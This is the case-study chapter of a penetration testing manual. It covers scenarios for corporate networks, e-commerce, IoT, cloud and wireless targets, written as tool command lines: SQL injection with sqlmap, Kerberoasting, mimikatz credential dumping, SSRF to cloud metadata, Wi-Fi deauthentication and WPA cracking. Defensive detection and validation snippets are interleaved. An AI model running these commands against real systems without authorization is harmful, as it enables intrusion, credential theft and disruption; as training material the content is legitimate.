Case Study Scenarios

Real-world penetration testing scenarios and methodologies

Scenario 1: Corporate Network Penetration

Target Environment:
  • Network: 192.168.10.0/24
  • Domain: corporate.local
  • Services: Web server, file server, domain controller

Phase 1: Reconnaissance

# Network discovery
nmap -sn 192.168.10.0/24

# Port scanning
nmap -sS -T4 -p- 192.168.10.0/24

# Service enumeration
nmap -sV -sC 192.168.10.0/24

# Results:
# 192.168.10.5  - Web server (80, 443)
# 192.168.10.10 - File server (445, 21)
# 192.168.10.15 - Domain controller (53, 88, 389, 445)

Phase 2: Vulnerability Assessment

# Web server analysis
nikto -h http://192.168.10.5
dirb http://192.168.10.5

# SMB enumeration
enum4linux 192.168.10.10
smbmap -H 192.168.10.10

# Domain controller enumeration
ldapsearch -x -h 192.168.10.15 -s base

Phase 3: Exploitation

# Web application exploit (SQLi found)
sqlmap -u "http://192.168.10.5/login.php" --data "username=admin&password=test" --dbs

# File server access (weak SMB config)
smbclient //192.168.10.10/shared -U guest%

# Domain controller attack (Kerberoasting)
impacket-GetUserSPNs corporate.local/user:password -dc-ip 192.168.10.15 -request
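A detection-side counterpart to the Kerberoasting step above, added here and not part of the manual: it scans a constructed set of Windows Event ID 4769 records (service ticket requested) and flags accounts that request RC4-encrypted tickets (etype 0x17) for many distinct service accounts within a short window, which is the footprint a bulk SPN request leaves on the domain controller. The record layout, account names and threshold are assumptions for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Event ID 4769, flattened to
# "timestamp|requesting account|service name|ticket encryption type".
# 0x17 = RC4-HMAC (what a Kerberoasting tool usually asks for), 0x12 = AES256.
SAMPLE_4769 = """\
2024-05-01T09:00:01|alice@CORPORATE.LOCAL|fs01$|0x12
2024-05-01T09:00:03|alice@CORPORATE.LOCAL|web01$|0x12
2024-05-01T09:05:10|jdoe@CORPORATE.LOCAL|svc_sql01|0x17
2024-05-01T09:05:11|jdoe@CORPORATE.LOCAL|svc_reports|0x17
2024-05-01T09:05:11|jdoe@CORPORATE.LOCAL|svc_backup|0x17
2024-05-01T09:05:12|jdoe@CORPORATE.LOCAL|svc_sql02|0x17
2024-05-01T09:05:13|jdoe@CORPORATE.LOCAL|svc_sharepoint|0x17
2024-05-01T10:30:00|bob@CORPORATE.LOCAL|svc_sql01|0x17
"""

def parse_4769(text):
    """Parse the flattened records into (timestamp, account, service, etype) tuples."""
    events = []
    for line in text.splitlines():
        ts, account, service, etype = line.split("|")
        events.append((datetime.fromisoformat(ts), account, service, int(etype, 16)))
    return events

def kerberoast_suspects(events, threshold=4, window=timedelta(minutes=5)):
    """Return {account: [services]} for accounts that requested RC4 tickets for
    at least `threshold` distinct services inside any `window`-long span.
    Tune the threshold per environment: domains that still rely on RC4 will
    produce 0x17 tickets legitimately, but rarely for many services at once."""
    rc4 = defaultdict(list)
    for ts, account, service, etype in events:
        if etype == 0x17:
            rc4[account].append((ts, service))
    suspects = {}
    for account, reqs in rc4.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            services = {svc for ts, svc in reqs[i:] if ts - start <= window}
            if len(services) >= threshold:
                suspects[account] = sorted(services)
                break
    return suspects

if __name__ == "__main__":
    for account, services in kerberoast_suspects(parse_4769(SAMPLE_4769)).items():
        print(f"{account}: {len(services)} RC4 service tickets -> {services}")
```

Single RC4 requests such as bob's are not flagged on their own; pair this with an inventory of which service accounts still have RC4 enabled and move them to AES-only keys.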

Phase 4: Post-Exploitation

# Privilege escalation on web server
./winpeas.exe

# Domain enumeration
bloodhound-python -u user -p password -ns 192.168.10.15 -d corporate.local -c all

# Credential dumping
mimikatz "sekurlsa::logonpasswords"

Scenario 2: E-commerce Website Assessment

Target: ecommerce.example.com

Phase 1: Information Gathering

# Subdomain enumeration
sublist3r -d example.com
amass enum -d example.com

# Technology fingerprinting
whatweb ecommerce.example.com

# SSL/TLS analysis
sslscan ecommerce.example.com
testssl.sh ecommerce.example.com

Phase 2: Web Application Testing

# Directory discovery
gobuster dir -u https://ecommerce.example.com -w /usr/share/wordlists/dirb/big.txt

# Parameter fuzzing (URL quoted so the shell does not treat ? as a glob)
wfuzz -c -z file,/usr/share/wordlists/wfuzz/general/common.txt --hh 0 "https://ecommerce.example.com/search?FUZZ=test"

# SQL injection testing
sqlmap -u "https://ecommerce.example.com/product.php?id=1" --batch --risk=3 --level=5

# XSS testing
xsser --url "https://ecommerce.example.com/search.php?q=XSS"

Phase 3: Business Logic Testing

Payment bypass testing:
  1. Intercept payment request
  2. Modify amount to $0.01
  3. Forward request
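The server-side control that makes the three-step amount modification above fail, added here as an example and not taken from the manual: the order total is recomputed from a server-held catalog and the client's "amount" field is treated only as a claim to verify. The catalog, SKUs and order layout are constructed for the example.

```python
from decimal import Decimal

# Constructed server-side catalog: the only source of price truth.
CATALOG = {
    "sku-100": Decimal("49.99"),
    "sku-200": Decimal("5.00"),
}

class PaymentTamperingError(ValueError):
    """Client-supplied amount does not match the server-computed total."""

def server_total(items):
    """Recompute the total from catalog prices and quantities, never from the client."""
    total = Decimal("0")
    for sku, qty in items:
        if sku not in CATALOG or not isinstance(qty, int) or qty <= 0:
            raise ValueError(f"invalid line item: {sku!r} x {qty!r}")
        total += CATALOG[sku] * qty
    return total

def authorize_payment(order):
    """order = {"items": [(sku, qty), ...], "amount": "<string as sent by the client>"}.
    Returns the Decimal amount to charge; raises if the claimed amount was altered."""
    expected = server_total(order["items"])
    claimed = Decimal(str(order["amount"]))
    if claimed != expected:
        raise PaymentTamperingError(f"claimed {claimed}, server total {expected}")
    return expected

def is_tampered(order):
    """Convenience wrapper: True when the order would be rejected as tampered."""
    try:
        authorize_payment(order)
    except PaymentTamperingError:
        return True
    return False

if __name__ == "__main__":
    cart = [("sku-100", 1), ("sku-200", 2)]                  # server total 59.99
    print(is_tampered({"items": cart, "amount": "59.99"}))   # False: untouched request
    print(is_tampered({"items": cart, "amount": "0.01"}))    # True: amount edited to $0.01
```

Log every mismatch together with the session and the claimed amount; the same comparison should run again when the payment provider's callback reports the captured amount, not only when the request is first forwarded.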

Scenario 3: IoT Device Assessment

Target: Smart home devices on 192.168.1.0/24

Phase 1: Device Discovery

# Network scan for IoT devices
nmap -sS -O 192.168.1.0/24

# Service fingerprinting
nmap -sV --script banner 192.168.1.0/24

# IoT-specific scanning
nmap --script http-title,http-headers 192.168.1.0/24 -p 80,443,8080,8443

Phase 2: IoT-Specific Attacks

# Default credential testing
hydra -C /usr/share/wordlists/default-credentials.txt http-get://192.168.1.100

# Firmware analysis (if downloadable)
binwalk firmware.bin
strings firmware.bin | grep -i password

# MQTT testing (if port 1883 open)
mosquitto_sub -h 192.168.1.100 -t '#'

Scenario 4: Cloud Infrastructure Assessment

Target: AWS/Azure cloud environment

Phase 1: Cloud Reconnaissance

# S3 bucket enumeration
aws s3 ls s3://target-bucket --no-sign-request

# Subdomain enumeration for cloud services
amass enum -d target.com | grep -E "(aws|azure|cloud)"

# Certificate transparency for cloud resources
curl -s "https://crt.sh/?q=%.target.com&output=json" | jq -r '.[].name_value' | grep -E "(aws|azure|cloud)"

Phase 2: Cloud-Specific Attacks

# S3 bucket permissions testing
aws s3 cp test.txt s3://target-bucket/test.txt --no-sign-request

# SSRF to metadata service (URL quoted so the shell does not treat ? as a glob)
curl "http://target.com/image?url=http://169.254.169.254/latest/meta-data/"

# IAM privilege enumeration (if credentials obtained)
aws sts get-caller-identity
aws iam list-attached-user-policies --user-name target-user
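The application-side guard that closes the SSRF-to-metadata path shown above, added here as an example and not part of the manual: before a feature like the image?url= endpoint fetches anything, every address behind the supplied URL is checked, and link-local (169.254.169.254 lives there), loopback and private ranges are refused. The scheme allowlist and the sample URLs are assumptions for the example.

```python
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}   # constructed policy: no file://, gopher://, etc.

def resolve_all(host):
    """Return every address `host` resolves to; IP literals need no DNS lookup."""
    try:
        return [ipaddress.ip_address(host)]
    except ValueError:
        pass
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []            # unresolvable: nothing safe to fetch
    return [ipaddress.ip_address(info[4][0]) for info in infos]

def is_safe_fetch_url(url):
    """True only if the URL uses an allowed scheme and every resolved address is
    globally routable. This rejects 169.254.0.0/16 and fe80::/10 (link-local,
    where cloud metadata services live), 127.0.0.0/8 and ::1, RFC 1918 and
    IPv6 ULA space, and embedded credentials in the authority part."""
    parts = urlparse(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    if parts.username is not None or parts.password is not None:
        return False
    ips = resolve_all(parts.hostname)
    if not ips:
        return False
    # Check every record: a name with one public and one internal address is still unsafe.
    return all(ip.is_global and not ip.is_link_local for ip in ips)

if __name__ == "__main__":
    for u in ("http://169.254.169.254/latest/meta-data/",
              "https://93.184.216.34/image.png"):
        print(u, "->", "allowed" if is_safe_fetch_url(u) else "blocked")
```

The check is only as good as the address the fetch actually connects to: resolve once, validate, and connect to that validated IP (or pin it in the HTTP client), otherwise a name that changes between validation and fetch bypasses the guard. On AWS, requiring IMDSv2 on the instance removes the simple GET shown above as a second layer.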

Scenario 5: Wireless Network Assessment

Phase 1: Wireless Reconnaissance

# Put wireless card in monitor mode
airmon-ng start wlan0

# Scan for access points
airodump-ng wlan0mon

# Target specific network
airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture

Phase 2: Wireless Attacks

# Deauthentication attack
aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# WPS attack
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

# WPA/WPA2 cracking
aircrack-ng -a2 -b AA:BB:CC:DD:EE:FF -w /usr/share/wordlists/rockyou.txt capture*.cap

Common Attack Chain Patterns

Pattern 1: External → Internal

Attack Chain:
  1. Reconnaissance: Subdomain enumeration, port scanning
  2. Web App Attack: SQL injection, file upload
  3. Shell Access: Reverse shell via web vulnerability
  4. Privilege Escalation: Local exploits, misconfigurations
  5. Lateral Movement: Credential reuse, SMB relay
  6. Domain Compromise: Kerberoasting, DCSync

Pattern 2: Phishing → Persistence

Attack Chain:
  1. Initial Access: Phishing email with malicious attachment
  2. Execution: PowerShell payload execution
  3. Privilege Escalation: UAC bypass, token impersonation
  4. Persistence: Registry autorun, scheduled task
  5. Collection: Keylogging, screenshot capture
  6. Exfiltration: DNS tunneling, HTTPS C2

Pattern 3: Physical → Digital

Attack Chain:
  1. Physical Access: Tailgating, lock picking
  2. USB Attack: Rubber Ducky, malicious USB
  3. Network Access: Ethernet connection, wireless
  4. Internal Enumeration: Network scanning, service discovery
  5. Credential Harvesting: Local password files, network sniffing
  6. Privilege Escalation: Kernel exploits, sudo abuse

Reporting & Documentation

Report Structure

  • Executive Summary: High-level overview for management
  • Methodology: Testing approach and scope
  • Technical Findings: Detailed vulnerability analysis
  • Recommendations: Remediation guidance and priorities

Finding Template

Each finding should include:
  • Title: Clear, descriptive title
  • Risk Rating: Critical/High/Medium/Low
  • Description: Technical explanation
  • Impact: Business impact assessment
  • Proof of Concept: Steps to reproduce
  • Recommendation: Specific remediation steps

Legal and Ethical Considerations

Authorization Requirements

Essential Requirements:
  • Written authorization from asset owner
  • Defined scope and limitations
  • Rules of engagement
  • Emergency contact procedures

Best Practices

Professional Guidelines:
  • Minimize system disruption
  • Maintain confidentiality
  • Document all activities
  • Report critical findings immediately
  • Secure all collected data

Additional Resources & Tools

Essential Tool Collections

  • Information Gathering: nmap, amass, sublist3r, theHarvester
  • Web Applications: burpsuite, gobuster, dirb, wfuzz
  • Password Attacks: hydra, medusa, john, hashcat
  • Post-Exploitation: mimikatz, bloodhound, impacket

Online Resources

  • Vulnerability database
  • National Vulnerability Database
  • Exploit database and archive
  • Hands-on penetration testing labs

Congratulations! You have completed the comprehensive Network Penetration Testing Manual. This resource covers the essential methodologies, tools, and techniques needed for professional penetration testing engagements. Remember to always follow legal and ethical guidelines in your security testing activities.